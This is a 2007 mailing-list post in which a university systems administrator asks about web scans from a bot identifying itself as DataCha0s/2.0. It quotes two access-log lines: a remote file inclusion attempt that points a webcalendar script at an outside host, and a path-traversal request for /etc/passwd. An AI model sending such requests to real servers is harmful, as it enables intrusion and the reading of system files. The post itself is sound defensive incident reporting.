[Dshield] DataCha0s/2.0?

Ryan McConigley ryan at csse.uwa.edu.au
Thu Apr 26 00:41:27 GMT 2007


	Hi, I'm just curious, but has anyone else noticed a sudden rush of attempted web exploits from a script/bot that identifies itself as DataCha0s/2.0?

	Typical logs look like : 

access_log:209.172.57.186 - - [25/Apr/2007:07:27:00 +0800] "GET /webcalendar//tools/send_reminders.php?includedir=http://www.whenweb.org/modules/TotalCalendar/cache/sool25.gif? HTTP/1.0" 301 430 "-" "DataCha0s/2.0"

access_log:133.3.8.135 - - [23/Apr/2007:11:14:21 +0800] "GET /bobh/gallery/view_photo.php?set_albumName=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd? HTTP/1.0" 302 - "-" "DataCha0s/2.0"

	The IP address resolve back to machines all over the place - German, US, Japan and New Zealand.  Looking back over my logs I've had a few before which seem to be scripted scans for generic vunerabilities, such as the password file or webcalendar exploits, but the most recent ones have been "customised" for specific URLs on our web server which is a trend I haven't seen before.

	Cheers, 
		Ryan.
--
          Ryan McConigley - Systems Administrator                  _.-,
     Computer Science   University of Western Australia        .--'  '-._
       Tel: (+61 8) 6488 7082 - Fax: (+61 8) 6488 1089       _/`-  _      '.
Ryan[@]csse.uwa.edu.au - http://www.csse.uwa.edu.au/~ryan  '----'._`.----. \
                                                                     `     \;
 "You're just jealous because the voices are talking to me"                ;_\




More information about the list mailing list